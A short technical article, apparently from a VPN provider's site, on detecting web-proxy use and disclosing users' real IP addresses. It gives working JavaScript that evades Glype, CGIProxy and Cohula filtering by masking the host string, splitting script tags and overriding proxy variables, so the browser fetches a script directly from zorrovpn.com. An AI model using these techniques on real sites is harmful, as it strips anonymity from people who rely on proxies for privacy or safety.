Web proxy detection and real IP address disclosure
To detect the usage of a web proxy, you can compare a real website address with the value of window.location.hostname, or check for the existence of a specific anonymizer's variables.
ginf.url // Glype window["_proxy_jslib_SCRIPT_URL"] // CGIProxy window["REAL_PROXY_HOST"] // Cohula
To learn a user's IP address, all you need to do is use some code in such a way that a web browser's request is sent not through a web proxy, but directly. For example, you can mask a website address (Cohula), divide the src attribute of the <script> tag between a few document.write functions (Glype), or redefine special variables used for making links (CGIProxy).
var our_proto = "https"; var our_host = "zorrovpn" + "." + "com"; // mask address var our_request = "show-js-ip"; // Trick for CGIProxy window["_proxy_jslib_THIS_HOST"] = our_host; window["_proxy_jslib_SCRIPT_NAME"] = "/" + our_request + "?#"; window["_proxy_jslib_SCRIPT_URL"] = our_proto + "://" + our_host + "/" + window["_proxy_jslib_SCRIPT_NAME"]; document.write('<script sr'); document.write('c="' + our_proto + ":" + '//' + our_host + '/' + our_request); document.write('"><\/script>');
You might have noticed that CGIProxy replaces with _proxy1_varname any variable whose name begins with _proxy, so use window["_proxy_varname"] instead.
You can research some web proxy detection techniques using Firebug or other developer tools included in your browser.
Tested with the latest Cohula, CGIProxy 2.1.6, and Glype 1.4.4
Source code is available at https://zorrovpn.com/articles/web-proxy-detection.js